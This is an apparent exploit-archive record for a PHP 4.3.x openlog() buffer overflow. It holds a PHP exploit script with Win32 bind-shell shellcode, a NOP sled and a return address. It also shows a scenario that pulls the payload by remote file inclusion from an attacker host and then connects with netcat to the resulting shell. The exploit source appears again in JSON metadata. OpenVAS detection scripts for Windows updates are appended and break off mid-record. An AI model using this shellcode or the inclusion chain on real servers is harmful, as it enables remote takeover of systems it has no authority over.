ID 1337DAY-ID-8493 Type zdt Reporter The Warlock [BhQ] Modified 2004-12-28T00:00:00
Description
Exploit for unknown platform in category remote exploits
==============================================
PHP <= 4.3.7 openlog() Buffer Overflow Exploit
==============================================
<?
#######################################################################
############################# PUBLIC EXPLOIT #########################
#######################################################################
## PHP v4.3.x exploit by The Warlock [BhQ], http://go.to/biohazardhq ##
################### mail:[email protected] ##################
######################################################################
############################ PUBLIC EXPLOIT ##########################
#######################################################################
/* This "Proof of Concept" sploit is only for Win2k SP4 + PHP 4.3.5 on Apache
2.0.49*
Sploit tested with Apache 2.0.49 + PHP 4.3.5 on a Win2K SP4.
bugtraq says local exploit.
This bug is reported a long long time ago for v4.3.1
bugs.php.net does not have any status that refers to this bug while
reported.
The bug is still alive in v4.3.5 and probably newer versions as well,
CHANGELOG of versions to 4.3.7 does not mention the bugfix of openlog();
scenario :
--->
http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt
BOOM....
netcat www.vulnerable.box 65535
Microsoft Windows 2000 [versie 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Program Files\Apache Group\Apache2>
--->
Getting a shell is better then parsing commands to the weblog.
[email protected] wrote on bugtraq :
>* Buffer overflow in openlog()
>
>I've tried passing long parameters (and large integers) to openlog(). No
>crashes could be caused by this "exploit". I was unable to demonstrate any
>disruption to PHP via this "vulnerability", let alone complete control.
>Unless the vendor or the original reporter will confirm this with code
>(which was, oddly enough, MISSING from the original advisory), I don't
>believe this "flaw" (if it exists) can do any damage to a default
>production system.
*/
#######################################################################
########################### PUBLIC EXPLOIT ###########################
#######################################################################
// win32 shellcode: bind TCP/65535, size 399, By The Warlock [BhQ].
$gift = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x02\x03";
$gift .= "\x02\x02\x83\xeb\xfc\xe2\xf4\xea\x55\x02\x02\x02\x50\x57\x54\x55";
$gift .= "\x88\x6e\x26\x1a\x88\x47\x3e\x89\x57\x07\x7a\x03\xe9\x89\x48\x1a";
$gift .= "\x88\x58\x22\x03\xe8\xe1\x30\x4b\x88\x36\x89\x03\xed\x33\xfd\xfe";
$gift .= "\x32\xc2\xae\x3a\xe3\x76\x05\xc3\xcc\x0f\x03\xc5\xe8\xf0\x39\x7e";
$gift .= "\x27\x16\x77\xe3\x88\x58\x26\x03\xe8\x64\x89\x0e\x48\x89\x58\x1e";
$gift .= "\x02\xe9\x89\x06\x88\x03\xea\xe9\x01\x33\xc2\x5d\x5d\x5f\x59\xc0";
$gift .= "\x0b\x02\x5c\x68\x33\x5b\x66\x89\x1a\x89\x59\x0e\x88\x59\x1e\x89";
$gift .= "\x18\x89\x59\x0a\x50\x6a\x8c\x4c\x0d\xee\xfd\xd4\x8a\xc5\x83\xee";
$gift .= "\x03\x03\x02\x02\x54\x54\x51\x8b\xe6\xea\x25\x02\x03\x02\x92\x03";
$gift .= "\x03\x02\xb4\x1b\x1b\xe5\xa6\x1b\x73\xeb\xe7\x4b\x85\x4b\xa6\x18";
$gift .= "\x73\xc5\xa6\xaf\x2d\xeb\xdb\x0b\xf6\xaf\xc9\xef\xff\x39\x55\x51";
$gift .= "\x31\x5d\x31\x30\x03\x59\x8f\x49\x23\x53\xfd\xd5\x8a\xdd\x8b\xc1";
$gift .= "\x8e\x77\x16\x68\x04\x5b\x53\x51\xfc\x36\x8d\xfd\x56\x06\x5b\x8b";
$gift .= "\x07\x8c\xe0\xf0\x28\x25\x56\xfd\x34\xfd\x57\x32\x32\xc2\x52\x52";
$gift .= "\x53\x52\x42\x52\x43\x52\xfd\x57\x2f\x8b\xc5\x33\xd8\x51\x51\x6a";
$gift .= "\x01\x02\xfd\xfd\x8a\xe2\x68\x12\x53\x55\xfd\x57\x27\x51\x55\xfd";
$gift .= "\x56\x2a\x51\x56\x54\xfd\x57\x22\x8a\xc5\x6a\x41\x4e\x46\x02\x8b";
$gift .= "\xe0\x85\xf8\x33\xc3\x8f\x7e\x26\xaf\x68\x17\x5b\xf0\xa9\x85\xf8";
$gift .= "\x80\xee\x56\xc4\x47\x26\x12\x46\x65\xc5\x46\x26\x3f\x03\x03\x8b";
$gift .= "\x7f\x26\x4a\x8b\x7f\x26\x4e\x8b\x7f\x26\x52\x8f\x47\x26\x12\x56";
$gift .= "\x53\x53\x53\x53\x42\x53\x4b\x53\x52\x51\x53\xfd\x76\x02\x6a\x70";
$gift .= "\xfd\xb1\x14\xfd\x56\x06\xfd\xd2\x8a\xe4\xfd\x77\x03\x6a\xaf\xdb";
$gift .= "\x06\xcc\xfd\x57\x07\x8b\xc1\x68\xfc\xfd\x34\xfd\xd0\xfd\x77\x02";
$gift .= "\x6b\x7c\xda\xe0\x70\xfd\x57\x06\x32\xd9\x51\xfd\xd3\x02\x02";
$ret = "\xb8\x9e\xe3\x77";
$nop =str_repeat("\x90", 1024);
$boomstring = $nop . $ret . $nop . $gift;
openlog($boomstring, LOG_PID, LOG_DAEMON);
// uncomment openlog(); to enable exploit... - str0ke did it already for ya.
?>
# 0day.today [2018-03-13] #
{"published": "2004-12-28T00:00:00", "id": "1337DAY-ID-8493", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:01:02", "bulletin": {"published": "2004-12-28T00:00:00", "id": "1337DAY-ID-8493", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 7.2, "modified": "2016-04-20T02:01:02"}}, "hash": "276345a84bba63752a9d473902734797a81eff9c0bce746359fdc6bda1fd17d6", "description": "Exploit for unknown platform in category remote exploits", "type": "zdt", "lastseen": "2016-04-20T02:01:02", "edition": 1, "title": "PHP <= 4.3.7 openlog() Buffer Overflow Exploit", "href": "http://0day.today/exploit/description/8493", "modified": "2004-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/8493", "references": [], "reporter": "The Warlock [BhQ]", "sourceData": "==============================================\r\nPHP <= 4.3.7 openlog() Buffer Overflow Exploit\r\n==============================================\r\n\r\n<?\r\n#######################################################################\r\n############################# PUBLIC EXPLOIT #########################\r\n#######################################################################\r\n\r\n## PHP v4.3.x exploit by The Warlock [BhQ], http://go.to/biohazardhq ##\r\n################### mail:biohazardhq@yahoo.com ##################\r\n######################################################################\r\n############################ PUBLIC EXPLOIT ##########################\r\n#######################################################################\r\n/* This \"Proof of Concept\" sploit is only for Win2k SP4 + PHP 4.3.5 on Apache\r\n2.0.49*\r\n\r\nSploit tested with Apache 2.0.49 + PHP 4.3.5 on a Win2K SP4.\r\nbugtraq says local exploit.\r\nThis bug is reported a long long time ago for v4.3.1\r\nbugs.php.net does not have any status that refers to this bug while\r\nreported.\r\nThe bug is still alive in v4.3.5 and probably newer versions as well,\r\nCHANGELOG of versions to 4.3.7 does not mention the bugfix of openlog();\r\n\r\nscenario :\r\n--->\r\nhttp://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt\r\nBOOM....\r\nnetcat www.vulnerable.box 65535\r\nMicrosoft Windows 2000 [versie 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\Program Files\\Apache Group\\Apache2>\r\n--->\r\n\r\nGetting a shell is better then parsing commands to the weblog.\r\n\r\nmattmurphy@kc.rr.com wrote on bugtraq :\r\n>* Buffer overflow in openlog()\r\n>\r\n>I've tried passing long parameters (and large integers) to openlog(). No\r\n>crashes could be caused by this \"exploit\". I was unable to demonstrate any\r\n>disruption to PHP via this \"vulnerability\", let alone complete control.\r\n>Unless the vendor or the original reporter will confirm this with code\r\n>(which was, oddly enough, MISSING from the original advisory), I don't\r\n>believe this \"flaw\" (if it exists) can do any damage to a default\r\n>production system.\r\n*/\r\n\r\n#######################################################################\r\n########################### PUBLIC EXPLOIT ###########################\r\n#######################################################################\r\n\r\n// win32 shellcode: bind TCP/65535, size 399, By The Warlock [BhQ].\r\n$gift = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x02\\x03\";\r\n$gift .= \"\\x02\\x02\\x83\\xeb\\xfc\\xe2\\xf4\\xea\\x55\\x02\\x02\\x02\\x50\\x57\\x54\\x55\";\r\n$gift .= \"\\x88\\x6e\\x26\\x1a\\x88\\x47\\x3e\\x89\\x57\\x07\\x7a\\x03\\xe9\\x89\\x48\\x1a\";\r\n$gift .= \"\\x88\\x58\\x22\\x03\\xe8\\xe1\\x30\\x4b\\x88\\x36\\x89\\x03\\xed\\x33\\xfd\\xfe\";\r\n$gift .= \"\\x32\\xc2\\xae\\x3a\\xe3\\x76\\x05\\xc3\\xcc\\x0f\\x03\\xc5\\xe8\\xf0\\x39\\x7e\";\r\n$gift .= \"\\x27\\x16\\x77\\xe3\\x88\\x58\\x26\\x03\\xe8\\x64\\x89\\x0e\\x48\\x89\\x58\\x1e\";\r\n$gift .= \"\\x02\\xe9\\x89\\x06\\x88\\x03\\xea\\xe9\\x01\\x33\\xc2\\x5d\\x5d\\x5f\\x59\\xc0\";\r\n$gift .= \"\\x0b\\x02\\x5c\\x68\\x33\\x5b\\x66\\x89\\x1a\\x89\\x59\\x0e\\x88\\x59\\x1e\\x89\";\r\n$gift .= \"\\x18\\x89\\x59\\x0a\\x50\\x6a\\x8c\\x4c\\x0d\\xee\\xfd\\xd4\\x8a\\xc5\\x83\\xee\";\r\n$gift .= \"\\x03\\x03\\x02\\x02\\x54\\x54\\x51\\x8b\\xe6\\xea\\x25\\x02\\x03\\x02\\x92\\x03\";\r\n$gift .= \"\\x03\\x02\\xb4\\x1b\\x1b\\xe5\\xa6\\x1b\\x73\\xeb\\xe7\\x4b\\x85\\x4b\\xa6\\x18\";\r\n$gift .= \"\\x73\\xc5\\xa6\\xaf\\x2d\\xeb\\xdb\\x0b\\xf6\\xaf\\xc9\\xef\\xff\\x39\\x55\\x51\";\r\n$gift .= \"\\x31\\x5d\\x31\\x30\\x03\\x59\\x8f\\x49\\x23\\x53\\xfd\\xd5\\x8a\\xdd\\x8b\\xc1\";\r\n$gift .= \"\\x8e\\x77\\x16\\x68\\x04\\x5b\\x53\\x51\\xfc\\x36\\x8d\\xfd\\x56\\x06\\x5b\\x8b\";\r\n$gift .= \"\\x07\\x8c\\xe0\\xf0\\x28\\x25\\x56\\xfd\\x34\\xfd\\x57\\x32\\x32\\xc2\\x52\\x52\";\r\n$gift .= \"\\x53\\x52\\x42\\x52\\x43\\x52\\xfd\\x57\\x2f\\x8b\\xc5\\x33\\xd8\\x51\\x51\\x6a\";\r\n$gift .= \"\\x01\\x02\\xfd\\xfd\\x8a\\xe2\\x68\\x12\\x53\\x55\\xfd\\x57\\x27\\x51\\x55\\xfd\";\r\n$gift .= \"\\x56\\x2a\\x51\\x56\\x54\\xfd\\x57\\x22\\x8a\\xc5\\x6a\\x41\\x4e\\x46\\x02\\x8b\";\r\n$gift .= \"\\xe0\\x85\\xf8\\x33\\xc3\\x8f\\x7e\\x26\\xaf\\x68\\x17\\x5b\\xf0\\xa9\\x85\\xf8\";\r\n$gift .= \"\\x80\\xee\\x56\\xc4\\x47\\x26\\x12\\x46\\x65\\xc5\\x46\\x26\\x3f\\x03\\x03\\x8b\";\r\n$gift .= \"\\x7f\\x26\\x4a\\x8b\\x7f\\x26\\x4e\\x8b\\x7f\\x26\\x52\\x8f\\x47\\x26\\x12\\x56\";\r\n$gift .= \"\\x53\\x53\\x53\\x53\\x42\\x53\\x4b\\x53\\x52\\x51\\x53\\xfd\\x76\\x02\\x6a\\x70\";\r\n$gift .= \"\\xfd\\xb1\\x14\\xfd\\x56\\x06\\xfd\\xd2\\x8a\\xe4\\xfd\\x77\\x03\\x6a\\xaf\\xdb\";\r\n$gift .= \"\\x06\\xcc\\xfd\\x57\\x07\\x8b\\xc1\\x68\\xfc\\xfd\\x34\\xfd\\xd0\\xfd\\x77\\x02\";\r\n$gift .= \"\\x6b\\x7c\\xda\\xe0\\x70\\xfd\\x57\\x06\\x32\\xd9\\x51\\xfd\\xd3\\x02\\x02\";\r\n\r\n\r\n$ret = \"\\xb8\\x9e\\xe3\\x77\";\r\n$nop =str_repeat(\"\\x90\", 1024);\r\n$boomstring = $nop . $ret . $nop . $gift;\r\nopenlog($boomstring, LOG_PID, LOG_DAEMON);\r\n// uncomment openlog(); to enable exploit... - str0ke did it already for ya.\r\n?>\r\n\r\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "c306f6d27c215bda9f130e75bd936bdf", "key": "href"}, {"hash": "b8ae61e3706db503567eb9b8934ee58a", "key": "title"}, {"hash": "b16529c5718d535980f88300bed4cd0d", "key": "sourceData"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "89afc1a8e8f2661de1eb7061d614131a", "key": "published"}, {"hash": "89afc1a8e8f2661de1eb7061d614131a", "key": "modified"}, {"hash": "bccc02971962dcd486de67718c46fb30", "key": "sourceHref"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a6d0ad99ef614c5f55bc8ea8ccd0d9f9", "key": "reporter"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category remote exploits", "hash": "e3c8ca80ed0389eb1564ce752d8ee0fc9970bdb9862316afe192eb0da92e692c", "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2018-03-13T16:14:11"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310814078", "OPENVAS:1361412562310814080", "OPENVAS:1361412562310814081", "OPENVAS:1361412562310814083", "OPENVAS:1361412562310814079", "OPENVAS:1361412562310814082"]}, {"type": "kaspersky", "idList": ["KLA11333"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_OCT_4462918.NASL", "SMB_NT_MS18_OCT_4462922.NASL", "SMB_NT_MS18_OCT_4462926.NASL", "SMB_NT_MS18_OCT_4462917.NASL", "SMB_NT_MS18_OCT_4462937.NASL", "SMB_NT_MS18_OCT_4462919.NASL", "FREEBSD_PKG_1E54D140849311E8A7950028F8D09152.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-30713", "1337DAY-ID-30608"]}, {"type": "exploitdb", "idList": ["EDB-ID:45019", "EDB-ID:44913"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148535", "PACKETSTORM:148273"]}], "modified": "2018-03-13T16:14:11"}, "vulnersScore": 0.7}, "type": "zdt", "lastseen": "2018-03-13T16:14:11", "edition": 2, "title": "PHP <= 4.3.7 openlog() Buffer Overflow Exploit", "href": "https://0day.today/exploit/description/8493", "modified": "2004-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "https://0day.today/exploit/8493", "references": [], "reporter": "The Warlock [BhQ]", "sourceData": "==============================================\r\nPHP <= 4.3.7 openlog() Buffer Overflow Exploit\r\n==============================================\r\n\r\n<?\r\n#######################################################################\r\n############################# PUBLIC EXPLOIT #########################\r\n#######################################################################\r\n\r\n## PHP v4.3.x exploit by The Warlock [BhQ], http://go.to/biohazardhq ##\r\n################### mail:[email\u00a0protected] ##################\r\n######################################################################\r\n############################ PUBLIC EXPLOIT ##########################\r\n#######################################################################\r\n/* This \"Proof of Concept\" sploit is only for Win2k SP4 + PHP 4.3.5 on Apache\r\n2.0.49*\r\n\r\nSploit tested with Apache 2.0.49 + PHP 4.3.5 on a Win2K SP4.\r\nbugtraq says local exploit.\r\nThis bug is reported a long long time ago for v4.3.1\r\nbugs.php.net does not have any status that refers to this bug while\r\nreported.\r\nThe bug is still alive in v4.3.5 and probably newer versions as well,\r\nCHANGELOG of versions to 4.3.7 does not mention the bugfix of openlog();\r\n\r\nscenario :\r\n--->\r\nhttp://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt\r\nBOOM....\r\nnetcat www.vulnerable.box 65535\r\nMicrosoft Windows 2000 [versie 5.00.2195]\r\n(C) Copyright 1985-2000 Microsoft Corp.\r\n\r\nC:\\Program Files\\Apache Group\\Apache2>\r\n--->\r\n\r\nGetting a shell is better then parsing commands to the weblog.\r\n\r\n[email\u00a0protected] wrote on bugtraq :\r\n>* Buffer overflow in openlog()\r\n>\r\n>I've tried passing long parameters (and large integers) to openlog(). No\r\n>crashes could be caused by this \"exploit\". I was unable to demonstrate any\r\n>disruption to PHP via this \"vulnerability\", let alone complete control.\r\n>Unless the vendor or the original reporter will confirm this with code\r\n>(which was, oddly enough, MISSING from the original advisory), I don't\r\n>believe this \"flaw\" (if it exists) can do any damage to a default\r\n>production system.\r\n*/\r\n\r\n#######################################################################\r\n########################### PUBLIC EXPLOIT ###########################\r\n#######################################################################\r\n\r\n// win32 shellcode: bind TCP/65535, size 399, By The Warlock [BhQ].\r\n$gift = \"\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x31\\xc9\\xb1\\x5e\\x81\\x73\\x17\\x02\\x03\";\r\n$gift .= \"\\x02\\x02\\x83\\xeb\\xfc\\xe2\\xf4\\xea\\x55\\x02\\x02\\x02\\x50\\x57\\x54\\x55\";\r\n$gift .= \"\\x88\\x6e\\x26\\x1a\\x88\\x47\\x3e\\x89\\x57\\x07\\x7a\\x03\\xe9\\x89\\x48\\x1a\";\r\n$gift .= \"\\x88\\x58\\x22\\x03\\xe8\\xe1\\x30\\x4b\\x88\\x36\\x89\\x03\\xed\\x33\\xfd\\xfe\";\r\n$gift .= \"\\x32\\xc2\\xae\\x3a\\xe3\\x76\\x05\\xc3\\xcc\\x0f\\x03\\xc5\\xe8\\xf0\\x39\\x7e\";\r\n$gift .= \"\\x27\\x16\\x77\\xe3\\x88\\x58\\x26\\x03\\xe8\\x64\\x89\\x0e\\x48\\x89\\x58\\x1e\";\r\n$gift .= \"\\x02\\xe9\\x89\\x06\\x88\\x03\\xea\\xe9\\x01\\x33\\xc2\\x5d\\x5d\\x5f\\x59\\xc0\";\r\n$gift .= \"\\x0b\\x02\\x5c\\x68\\x33\\x5b\\x66\\x89\\x1a\\x89\\x59\\x0e\\x88\\x59\\x1e\\x89\";\r\n$gift .= \"\\x18\\x89\\x59\\x0a\\x50\\x6a\\x8c\\x4c\\x0d\\xee\\xfd\\xd4\\x8a\\xc5\\x83\\xee\";\r\n$gift .= \"\\x03\\x03\\x02\\x02\\x54\\x54\\x51\\x8b\\xe6\\xea\\x25\\x02\\x03\\x02\\x92\\x03\";\r\n$gift .= \"\\x03\\x02\\xb4\\x1b\\x1b\\xe5\\xa6\\x1b\\x73\\xeb\\xe7\\x4b\\x85\\x4b\\xa6\\x18\";\r\n$gift .= \"\\x73\\xc5\\xa6\\xaf\\x2d\\xeb\\xdb\\x0b\\xf6\\xaf\\xc9\\xef\\xff\\x39\\x55\\x51\";\r\n$gift .= \"\\x31\\x5d\\x31\\x30\\x03\\x59\\x8f\\x49\\x23\\x53\\xfd\\xd5\\x8a\\xdd\\x8b\\xc1\";\r\n$gift .= \"\\x8e\\x77\\x16\\x68\\x04\\x5b\\x53\\x51\\xfc\\x36\\x8d\\xfd\\x56\\x06\\x5b\\x8b\";\r\n$gift .= \"\\x07\\x8c\\xe0\\xf0\\x28\\x25\\x56\\xfd\\x34\\xfd\\x57\\x32\\x32\\xc2\\x52\\x52\";\r\n$gift .= \"\\x53\\x52\\x42\\x52\\x43\\x52\\xfd\\x57\\x2f\\x8b\\xc5\\x33\\xd8\\x51\\x51\\x6a\";\r\n$gift .= \"\\x01\\x02\\xfd\\xfd\\x8a\\xe2\\x68\\x12\\x53\\x55\\xfd\\x57\\x27\\x51\\x55\\xfd\";\r\n$gift .= \"\\x56\\x2a\\x51\\x56\\x54\\xfd\\x57\\x22\\x8a\\xc5\\x6a\\x41\\x4e\\x46\\x02\\x8b\";\r\n$gift .= \"\\xe0\\x85\\xf8\\x33\\xc3\\x8f\\x7e\\x26\\xaf\\x68\\x17\\x5b\\xf0\\xa9\\x85\\xf8\";\r\n$gift .= \"\\x80\\xee\\x56\\xc4\\x47\\x26\\x12\\x46\\x65\\xc5\\x46\\x26\\x3f\\x03\\x03\\x8b\";\r\n$gift .= \"\\x7f\\x26\\x4a\\x8b\\x7f\\x26\\x4e\\x8b\\x7f\\x26\\x52\\x8f\\x47\\x26\\x12\\x56\";\r\n$gift .= \"\\x53\\x53\\x53\\x53\\x42\\x53\\x4b\\x53\\x52\\x51\\x53\\xfd\\x76\\x02\\x6a\\x70\";\r\n$gift .= \"\\xfd\\xb1\\x14\\xfd\\x56\\x06\\xfd\\xd2\\x8a\\xe4\\xfd\\x77\\x03\\x6a\\xaf\\xdb\";\r\n$gift .= \"\\x06\\xcc\\xfd\\x57\\x07\\x8b\\xc1\\x68\\xfc\\xfd\\x34\\xfd\\xd0\\xfd\\x77\\x02\";\r\n$gift .= \"\\x6b\\x7c\\xda\\xe0\\x70\\xfd\\x57\\x06\\x32\\xd9\\x51\\xfd\\xd3\\x02\\x02\";\r\n\r\n\r\n$ret = \"\\xb8\\x9e\\xe3\\x77\";\r\n$nop =str_repeat(\"\\x90\", 1024);\r\n$boomstring = $nop . $ret . $nop . $gift;\r\nopenlog($boomstring, LOG_PID, LOG_DAEMON);\r\n// uncomment openlog(); to enable exploit... - str0ke did it already for ya.\r\n?>\r\n\r\n\n# 0day.today [2018-03-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "37e5d5b6ac3ce6fb6d3a6ab0f49b2bf0", "key": "description"}, {"hash": "04aee93e8b116d991b662560479bc481", "key": "href"}, {"hash": "89afc1a8e8f2661de1eb7061d614131a", "key": "modified"}, {"hash": "89afc1a8e8f2661de1eb7061d614131a", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a6d0ad99ef614c5f55bc8ea8ccd0d9f9", "key": "reporter"}, {"hash": "5a135917db610b1bb23be33e82ff1133", "key": "sourceData"}, {"hash": "e8f8e6292898ede0da93554160f4eae1", "key": "sourceHref"}, {"hash": "b8ae61e3706db503567eb9b8934ee58a", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"openvas": [{"lastseen": "2019-05-29T18:33:13", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462922", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814078", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814078", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462922)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462922)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814078\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8503\", \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\",\n \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\",\n \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\",\n \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8490\", \"CVE-2018-8491\",\n \"CVE-2018-8493\", \"CVE-2018-8494\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-10 08:49:30 +0530 (Wed, 10 Oct 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4462922)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4462922\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Windows Win32k component fails to properly handle objects in memory.\n\n - Windows Hyper-V on a host server fails to properly validate input from an\n authenticated user on a guest operating system.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface (GDI) improperly handles objects in memory.\n\n - Windows TCP/IP stack improperly handles fragmented IP packets.\n\n - Windows Media Player improperly discloses file information.\n\n - Microsoft XML Core Services MSXML parser improperly processes user input.\n\n - DirectX Graphics Kernel (DXGKRNL) driver improperly handles objects in memory.\n\n - Filter Manager improperly handles objects in memory.\n\n - Windows kernel improperly handles objects in memory.\n\n - Windows Theme API does not properly decompress files.\n\n - NTFS improperly checks access.\n\n - Chakra scripting engine improperly handles objects in memory in Microsoft Edge.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code, gain the same user rights as the current user, obtain\n information to further compromise the user's system, improperly discloses file\n information and escalate privileges.\");\n\n script_tag(name:\"affected\", value:\"Windows 10 for 32-bit Systems\n\n Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4462922\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.18004\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.18004\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:15", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4462926", "modified": "2019-05-03T00:00:00", "published": "2018-10-10T00:00:00", "id": "OPENVAS:1361412562310814083", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814083", "title": "Microsoft Windows Multiple Vulnerabilities (KB4462926)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4462926)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814083\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-8320\", \"CVE-2018-8330\", \"CVE-2018-8333\", \"CVE-2018-8411\",\n \"CVE-2018-8413\", \"CVE-2018-8423\", \"CVE-2018-8453\", \"CVE-2018-8460\",\n \"CVE-2018-8472\", \"CVE-2018-8481\", \"CVE-2018-8482\", \"CVE-2018-8484\",\n \"CVE-2018-8486\", \"CVE-2018-8489\", \"CVE-2018-8491\", \"CVE-2018-8493\",\n \"CVE-2018-8494\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", 